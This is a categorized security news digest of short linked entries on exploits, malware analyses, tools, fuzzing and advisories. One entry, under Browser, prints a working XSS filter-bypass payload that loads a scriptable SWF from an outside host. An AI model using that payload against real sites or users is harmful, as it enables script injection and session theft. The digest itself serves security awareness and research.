[ Android ]  Just published a new blog post! Using Android's ashmem to escalate privileges from any context. As always, exploits… https://twitter.com/i/web/status/804373455189766144

[ Android ]  Analysis of multiple vulnerabilities in AirDroid https://shar.es/18cttj by @ evilsocket

[ Attack ]  Our research projects that machine learning will be key tool for socially engineered hacks in 2017… https://twitter.com/i/web/status/804189312216690690

[ Browser ]  MSEdge XSS Filter bypass: <embed/:script allowscriptaccess=always src=//l0.cm/xss.swf> https://vulnerabledoma.in/char_test?body=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E

[ Fuzzing ]  Google Open Source Blog: Announcing OSS-Fuzz: Continuous fuzzing for open source software https://opensource.googleblog.com/2016/12/announcing-oss-fuzz-continuous-fuzzing.html via @ google

[ IoTDevice ]  On the (in)security of the Latest Generation Implantable Cardiac Defibrillators and How to Secure Them (pdf) https://t.co/6flMfZrusK

[ Malware ]  New post: New SmsSecurity Variant Roots Phones, Abuses Accessibility Features and TeamViewer http://bit.ly/2gBzgDx @ TrendMicro

[ MalwareAnalysis ]  Malicious Document Analysis – Macro to Shellcode : https://bittherapy.net/malicious-document-analysis-macro-to-shellcode/

[ Others ]  Patch for #0day vulnerability in Firefox is now available. Manual patch available here: https://www.mozilla.org/en-US/firefox/new/

[ Others ]  Decrypting http://ASP.NET 4.5 https://lowleveldesign.wordpress.com/2016/11/30/decrypting-asp-net-4-5/

[ Popular Software ]  FreePBX 13 : From Cross-Site Scripting to Remote Command Execution : https://blog.ripstech.com/2016/freepbx-from-cross-site-scripting-to-remote-command-execution/

[ Popular Software ]  Omnivista 8770 Unauthenticated Remote Code Execution : http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html , Github : https://github.com/malerisch/omnivista-8770-unauth-rce cc @ malerisch

[ Tools ]  Use SAMRi10 to harden remote access to the SAM in Windows 10/2016 by @TalBeerySec @ItaiGrady #infosec #DFIR https://t.co/Plw0viB89k

[ Tools ]  The a Event Viewer UAC bypass module just landed in master. Thanks again to @enigma0x3 for the effort! https://t.co/YsHSzNeE9O

[ Tools ]  DOMFf : DOM forensics framework (Python based) : https://github.com/graniet/DOMFf cc @ graniet75

[ Tools ]  Running shellcode inside msbuild... https://github.com/vvalien/SharpMeter https://t.co/Dg6oVdWlJX

[ Vulnerability ]  No post-turkey naps for us. 37 new 0-days disclosed to vendors (Adobe/Foxit/ThinPrint/HPE/MSFT) this week. #whew http://bit.ly/2h08LLr

[ Web Security ]  HTTP/2 : In-depth analysis of the top four flaws of the next generation web protocol : https://www.imperva.com/docs/Imperva_HII_HTTP2.pdf (pdf)

[ Web Security ]  Bypassing CSP using polyglot JPEGs : http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html cc: @ garethheyes

[ Windows ]  Microsoft Windows Limited Bypass Of Traverse Permissions In Kernel Object Manager https://packetstormsecurity.com/files/139974/GS20161201163955.tgz

[ Windows ]  FuzzySec -> Windows Kernel Exploitation: Stack Overflow - http://www.fuzzysecurity.com/tutorials/expDev/14.html

[ WirelessSecurity ]  OpenBTS Application Suite Release 4.0 User Manual [PDF] http://openbts.org/site/wp-content/uploads/2014/07/OpenBTS-4.0-Manual.pdf #GnuRadio #SDR #GSM https://t.co/rVpOiQvOko